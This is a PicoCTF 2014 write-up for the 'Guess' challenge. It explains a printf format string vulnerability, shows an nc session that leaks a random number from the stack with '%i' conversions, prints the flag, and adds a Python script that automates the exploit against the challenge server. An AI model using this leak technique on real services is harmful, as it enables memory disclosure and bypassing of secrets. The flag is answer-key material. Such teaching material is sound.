PicoCTF 2014 Write-ups

Guess - 75 (Binary Exploitation)

Writeup by Oksisane

Created: 2014-11-22 14:08:55

Last modified: 2014-11-22 15:15:33

Problem

This program requires you to guess a random 32-bit number! Sounds difficult, right? There is a server running at vuln2014.picoctf.com:4546, and the source can be found here.

Hint

The only way to combat secure randomness is to leak the secret.

Answer

Overview

Exploit a basic format string vulnerability to leak the random number before guessing it.

Details

Looking at the source code, these lines immediately stand out:

printf("Hello! What is your name?\n");

fgets(name, sizeof(name), stdin);

printf("Welcome to the guessing game, ");
printf(name);

Here we can see that the program reads in your name, then passes it to printf as the format string itself. A printf whose format string comes from user input has a set of very serious vulnerabilities: conversions such as %x, %i and %s read values from wherever printf expects its arguments (the stack, on 32-bit x86), and %n writes to them (see the writeup on Format for more detail). Since no arguments are actually passed, each %i in our name makes printf print the next word from the stack: a name of %i prints one integer, %i %i prints two, and so on, repeated as many times as we need to reach the randomly generated number. As it turns out, the integer we want is in the 4th position, so we enter our name as %i %i %i %i (a positional conversion, %4$i, would print only that slot) and then enter the number to pass the check!

$ nc vuln2014.picoctf.com 4546
Hello! What is your name?
%i %i %i %i
Welcome to the guessing game, 32 -143569888 160419848 765327463

I generated a random 32-bit number.
You have a 1 in 2^32 chance of guessing it. Good luck.
What is your guess?
765327463
Wow! You guessed it!
Your flag is: leak_the_seakret
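The session above can be automated. The script below is an added example and not part of the original write-up; it assumes the host, port and greeting text shown above, and the helper and variable names are its own. The sample greeting it parses is the line captured in the nc session, embedded so the parsing logic can be exercised offline.

```python
import socket

# Greeting exactly as it appeared in the nc session above (constructed sample
# for offline testing; the leaked values differ on every connection).
SAMPLE_GREETING = "Welcome to the guessing game, 32 -143569888 160419848 765327463"
GREETING_PREFIX = "Welcome to the guessing game, "


def leak_format(count):
    """Name that makes printf dump `count` argument slots as signed ints."""
    return " ".join(["%i"] * count)


def positional_format(index):
    """Same leak with a single conversion: %N$i reads argument slot N directly."""
    return "%%%d$i" % index


def parse_leak(line, index):
    """Return the `index`-th (1-based) integer printed after the greeting prefix."""
    line = line.rstrip("\r\n")
    if not line.startswith(GREETING_PREFIX):
        raise ValueError("unexpected greeting: %r" % line)
    values = [int(tok) for tok in line[len(GREETING_PREFIX):].split()]
    if len(values) < index:
        raise ValueError("only %d values leaked, wanted index %d" % (len(values), index))
    return values[index - 1]


def recv_until(sock, marker, limit=4096):
    """Read from sock until `marker` is seen, the peer closes, or `limit` bytes."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
    return buf


def solve(host="vuln2014.picoctf.com", port=4546, index=4):
    """Leak the secret with the format string, then submit it as the guess.

    Mirrors the manual nc session; `index` is the stack slot holding the
    random number (4 in the write-up). Not exercised offline.
    """
    with socket.create_connection((host, port), timeout=10) as s:
        recv_until(s, b"What is your name?")
        s.sendall((leak_format(index) + "\n").encode())
        reply = recv_until(s, b"What is your guess?").decode(errors="replace")
        greeting = next(ln for ln in reply.splitlines() if ln.startswith(GREETING_PREFIX))
        secret = parse_leak(greeting, index)
        s.sendall(("%d\n" % secret).encode())
        return recv_until(s, b"flag").decode(errors="replace")


if __name__ == "__main__":
    print(solve())
```

If the secret's slot is known, positional_format(4) sends a single %4$i and the leaked line then contains only that value, so it is parsed with parse_leak(line, 1).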

Flag

leak_the_seakret